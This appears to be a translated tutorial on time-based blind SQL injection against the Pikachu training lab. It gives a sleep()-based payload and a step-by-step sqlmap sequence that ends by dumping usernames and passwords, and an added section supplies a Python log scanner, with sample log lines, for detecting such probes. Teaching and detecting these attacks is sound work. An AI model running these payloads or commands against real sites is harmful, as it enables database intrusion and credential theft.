Time-based injection
Exploitation principle
Main functions used
sleep()
substring()
if()
Example:
1' and if(substring((select * from students limit 1),1,1)='a',sleep(5),0)
# Sleep when the condition is met
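Seen from the defending side, requests of this shape stand out in web server logs. The following is an added example, not part of the original page: it flags query parameters that carry a delay function and checks whether the response actually stalled. The log layout (combined format with the request time in seconds appended), the sample lines and the 3-second threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Delay primitives (MySQL sleep()/benchmark()) and the conditional/extraction
# helpers this page names, plus common equivalents (substr, mid, ascii, ord).
DELAY = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
PROBE = re.compile(r"\b(?:if|substring|substr|mid|ascii|ord)\s*\(", re.I)
# Assumed log layout: combined format with the request time in seconds appended.
LINE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) [^"]*" '
                  r'\d{3} \S+ (?P<secs>\d+\.\d+)$')

def classify(line, slow_after=3.0):
    """Return a finding for a request carrying a delay function, else None."""
    m = LINE.match(line)
    if not m:
        return None
    # parse_qsl URL-decodes values, so %27, %28 and '+' do not hide the payload.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if DELAY.search(value):
            return {"ip": m["ip"], "param": name,
                    "conditional": bool(PROBE.search(value)),
                    "fired": float(m["secs"]) >= slow_after}
    return None

def summarize(lines, slow_after=3.0):
    """Per source IP: number of delay probes and how many actually stalled."""
    stats = defaultdict(lambda: {"probes": 0, "fired": 0})
    for line in lines:
        hit = classify(line, slow_after)
        if hit:
            stats[hit["ip"]]["probes"] += 1
            stats[hit["ip"]]["fired"] += hit["fired"]
    return dict(stats)

# Everything below is constructed sample data, not captured traffic.
def sample_line(ip, path, query, secs):
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {path}?{query} HTTP/1.1" 200 512 {secs:.3f}'

# Payload text mirrors the example on this page; only the guessed character varies.
PAYLOAD = "1' and if(substring((select * from students limit 1),1,1)='{}',sleep(5),0)#"
VULN = "/06/vul/sqli/sqli_str.php"
SAMPLE = [
    sample_line("192.0.2.10", VULN, "name=alice&submit=1", 0.012),
    sample_line("198.51.100.7", VULN, f"name={quote_plus(PAYLOAD.format('a'))}&submit=1", 0.015),
    sample_line("198.51.100.7", VULN, f"name={quote_plus(PAYLOAD.format('p'))}&submit=1", 5.021),
    sample_line("192.0.2.11", "/search.php", "q=sleep+hygiene", 0.020),  # benign word
    sample_line("192.0.2.12", "/report.php", "year=2023", 6.200),        # slow, no payload
]
print(summarize(SAMPLE))
```

A source with many delay probes of which only some stall matches the character-by-character guessing shown in the example payload.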
Injection using sqlmap
1. Check whether time-based injection is possible
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql
2. Get the database name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --dbms mysql --current-user --current-db --batch
-p:
Specify the parameter to test
-u:
Specify the URL
-v:
Set the output verbosity level
--dbms:
Specify the back-end database type
--technique=T:
Use the time-based injection technique
--current-user:
Get the current user
--current-db:
Get the current database
--batch:
Never prompt for input; answer every question with the default (y)
3. Get the table name
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --tables -D pikachu --batch
-D:
Specify the database name
--tables:
Get all the tables
4. Get the field names
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T --columns -D pikachu -T users --batch
-T:
Specify the table name
--columns:
Get all the fields
5. Obtain the account passwords
sqlmap -u "192.168.0.106/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name -v 1 --technique=T -D pikachu -T users -C 'username,password' --dump --batch --threads 10
--dump:
Dump the entries of the selected table
-C:
Specify the fields
--threads:
Specify the number of threads